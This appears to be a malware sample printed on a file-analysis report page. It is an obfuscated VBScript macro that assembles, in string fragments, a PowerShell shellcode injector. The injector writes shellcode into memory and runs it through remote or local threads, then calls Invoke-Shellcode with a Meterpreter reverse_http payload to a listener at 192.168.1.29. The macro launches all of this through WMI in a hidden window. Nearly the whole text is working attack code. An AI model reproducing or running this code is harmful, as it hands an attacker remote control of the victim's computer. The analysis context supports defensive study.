$VirtualAllocExAddr = Get-ProcAddress ke"
jC = jC + "rnel32.dll VirtualAllocEx"
$VirtualAllocEx"
jC = jC + "Delegate = Get-DelegateType @([IntPtr], [IntPtr], "
jC = jC + "[Uint32], [UInt32], [UInt32]) ([IntPtr])"
"
jC = jC + "$VirtualAllocEx = [System.Runtime.InteropServices."
jC = jC + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
jC = jC + "locExAddr, $VirtualAllocExDelegate)"
$Writ"
jC = jC + "eProcessMemoryAddr = Get-ProcAddress kernel32.dll "
jC = jC + "WriteProcessMemory"
$WriteProcessMemoryDel"
jC = jC + "egate = Get-DelegateType @([IntPtr], [IntPtr], [By"
jC = jC + "te[]], [UInt32], [UInt32].MakeByRefType()) ([Bool]"
jC = jC + ")"
$WriteProcessMemory = [System.Runtime.I"
jC = jC + "nteropServices.Marshal]::GetDelegateForFunctionPoi"
jC = jC + "nter($WriteProcessMemoryAddr, $WriteProcessMemoryD"
jC = jC + "elegate)"
$CreateRemoteThreadAddr = Get-Pr"
jC = jC + "ocAddress kernel32.dll CreateRemoteThread"
"
jC = jC + " $CreateRemoteThreadDelegate = Get-DelegateType @("
jC = jC + "[IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], "
jC = jC + "[UInt32], [IntPtr]) ([IntPtr])"
$CreateRem"
jC = jC + "oteThread = [System.Runtime.InteropServices.Marsha"
jC = jC + "l]::GetDelegateForFunctionPointer($CreateRemoteThr"
jC = jC + "eadAddr, $CreateRemoteThreadDelegate)"
$Cl"
jC = jC + "oseHandleAddr = Get-ProcAddress kernel32.dll Close"
jC = jC + "Handle"
$CloseHandleDelegate = Get-Delegat"
jC = jC + "eType @([IntPtr]) ([Bool])"
$CloseHandle ="
jC = jC + " [System.Runtime.InteropServices.Marshal]::GetDele"
jC = jC + "gateForFunctionPointer($CloseHandleAddr, $CloseHan"
jC = jC + "dleDelegate)"
if ( $Force -or $psCmdlet.Sh"
jC = jC + "ouldContinue( 'Do you wish to carry out your evil "
jC = jC + "plans?',"
"Injecting shellcode in"
jC = jC + "jecting into $((Get-Process -Id $ProcessId).Proces"
jC = jC + "sName) ($ProcessId)!" ) )
{
"
jC = jC + "Inject-RemoteShellcode $ProcessId"
}
"
jC = jC + "}"
Else
{
$VirtualAllocAddr = Ge"
jC = jC + "t-ProcAddress kernel32.dll VirtualAlloc"
$"
jC = jC + "VirtualAllocDelegate = Get-DelegateType @([IntPtr]"
jC = jC + ", [UInt32], [UInt32], [UInt32]) ([IntPtr])"
"
jC = jC + " $VirtualAlloc = [System.Runtime.InteropServices."
jC = jC + "Marshal]::GetDelegateForFunctionPointer($VirtualAl"
jC = jC + "locAddr, $VirtualAllocDelegate)"
$VirtualF"
jC = jC + "reeAddr = Get-ProcAddress kernel32.dll VirtualFree"
jC = jC + ""
$VirtualFreeDelegate = Get-DelegateType "
jC = jC + "@([IntPtr], [Uint32], [UInt32]) ([Bool])"
"
jC = jC + "$VirtualFree = [System.Runtime.InteropServices.Mar"
jC = jC + "shal]::GetDelegateForFunctionPointer($VirtualFreeA"
jC = jC + "ddr, $VirtualFreeDelegate)"
$CreateThreadA"
jC = jC + "ddr = Get-ProcAddress kernel32.dll CreateThread"
"
jC = jC + " $CreateThreadDelegate = Get-DelegateType @("
jC = jC + "[IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], "
jC = jC + "[IntPtr]) ([IntPtr])"
$CreateThread = [Sys"
jC = jC + "tem.Runtime.InteropServices.Marshal]::GetDelegateF"
jC = jC + "orFunctionPointer($CreateThreadAddr, $CreateThread"
jC = jC + "Delegate)"
$WaitForSingleObjectAddr = Get-"
jC = jC + "ProcAddress kernel32.dll WaitForSingleObject"
"
jC = jC + " $WaitForSingleObjectDelegate = Get-DelegateTyp"
jC = jC + "e @([IntPtr], [Int32]) ([Int])"
$WaitForSi"
jC = jC + "ngleObject = [System.Runtime.InteropServices.Marsh"
jC = jC + "al]::GetDelegateForFunctionPointer($WaitForSingleO"
jC = jC + "bjectAddr, $WaitForSingleObjectDelegate)"
"
jC = jC + "if ( $Force -or $psCmdlet.ShouldContinue( 'Do you "
jC = jC + "wish to carry out your evil plans?',"
"
jC = jC + " "Injecting shellcode into the running PowerSh"
jC = jC + "ell process!" ) )
{
Inject-L"
jC = jC + "ocalShellcode"
}
}
}
Invoke-Shell"
jC = jC + "code -Payload windows/meterpreter/reverse_http -Lh"
jC = jC + "ost 192.168.1.29 -Lport 80 -Force"
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create jC, Null, objConfig, intProcessID
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.